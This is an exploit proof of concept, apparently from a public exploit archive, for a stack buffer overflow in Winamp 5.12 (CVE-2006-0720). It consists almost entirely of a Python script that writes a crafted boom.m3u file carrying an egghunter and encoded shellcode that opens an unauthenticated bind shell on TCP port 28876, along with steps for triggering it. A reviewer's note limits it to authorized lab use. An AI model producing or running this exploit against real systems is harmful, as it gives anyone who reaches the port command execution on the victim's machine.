
Winamp 5.12 Buffer Overflow

Posted on 18 June 2013

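"""Winamp 5.12 .m3u stack-based buffer overflow (CVE-2006-0720, BID 16785).

Exploit Title:   Winamp 5.12 .m3u stack based buffer overflow
Date:            16 June 2013
Exploit Author:  superkojiman - http://www.techorganic.com
Vendor Homepage: http://www.winamp.com/
Software Link:   http://www.oldapps.com/winamp.php?old_winamp=211
Version:         5.12
Tested on:       Windows XP Professional SP2, English
CVE:             CVE-2006-0720
BID:             16785

Description from CVE-2006-0720:
    Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows
    user-assisted attackers to cause a denial of service (crash) and
    possibly execute arbitrary code via a crafted .m3u file that causes
    an incorrect strncpy function call when the player pauses or stops
    the file.

Usage:
    1. Launch Winamp
    2. Drag boom.m3u into Winamp window
    3. Check for bind shell on port 28876

NOTE(review): proof-of-concept for systems you are authorized to test.
The payload is an *unauthenticated* bind shell: once it runs, anyone who
can reach TCP/28876 on the victim gets command execution in Winamp's
security context, so only run it on an isolated lab network.

The listing this was recovered from had lost its backslash escapes
("x90" for "\\x90"); they are restored here and the whole payload is
built as bytes so the file can be written in binary mode.
"""
import struct

# Extended-M3U header. Both directives are line terminated; the original
# terminator is assumed to be "\n" (it was garbled in the recovered listing).
header = b"#EXTM3U\n"
header += b"#EXTINF:1234,Pwnage Rock\n"

# NtDisplayString egghunter: walks memory page by page looking for the
# "w00tw00t" tag that prefixes the real shellcode, then jumps to it.
egghunter = (
    b"\x90" * 64
    + b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58"  # or dx,0xfff; inc edx; push edx; push 0x43; pop eax
    + b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"          # int 0x2e; cmp al,5; pop edx; je; mov eax,<tag>
    + b"\x77\x30\x30\x74"                          # "w00t"
    + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  # mov edi,edx; scasd; jnz; scasd; jnz; jmp edi
    + b"\x90" * 30
)

# Filler up to the saved return address, then a NOP sled into the egghunter.
junk = b"\x41" * 262 + b"\x90" * 100 + egghunter

# Bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
# The leading "w00tw00t" is the tag the egghunter searches for; the NOPs
# keep the encoded stub clear of the tag.
shellcode = (
    b"w00tw00t"
    + b"\x90" * 239
    + b"\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9"
    + b"\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83"
    + b"\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65"
    + b"\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8"
    + b"\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e"
    + b"\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60"
    + b"\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f"
    + b"\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20"
    + b"\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41"
    + b"\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a"
    + b"\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1"
    + b"\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36"
    + b"\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56"
    + b"\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5"
    + b"\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81"
    + b"\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08"
    + b"\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78"
    + b"\x44\x83\x55"
)

# 0x022B368C: "call ecx" in C:\Program Files\Winamp\pxsdkpls.dll.
# Non-ASLR, non-rebased module on the tested XP SP2 install; the address
# is install-specific and must be re-verified on any other target.
ret = struct.pack("<I", 0x022B368C)

# For some reason EIP doesn't get overwritten and Winamp crashes
# differently unless the 4th byte after ret is a 0xB0. There's probably
# an easier way to do this, but this is what the fuzzer found first so...
wtf = b"\x43\x43\x43\xB0"


def build_payload() -> bytes:
    """Return the complete boom.m3u contents as bytes.

    Layout: M3U header, filler + NOP sled + egghunter, tagged bind-shell
    shellcode, the "call ecx" return address, then the 4 trailer bytes.
    Kept separate from file I/O so the layout can be checked without
    touching disk.
    """
    return header + junk + shellcode + ret + wtf


def main() -> None:
    """Write boom.m3u into the current directory and print the usage steps.

    The file is opened in binary mode: in text mode on Windows the header
    newlines would be rewritten as CR LF, shifting every offset in the
    payload and breaking the EIP overwrite.
    """
    with open("boom.m3u", "wb") as f:
        f.write(build_payload())
    print("Created boom.m3u")
    print("1. Open Winamp")
    print("2. Drag boom.m3u into Winamp window")
    print("3. Check for bind shell on port 28876")


if __name__ == "__main__":
    main()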

 
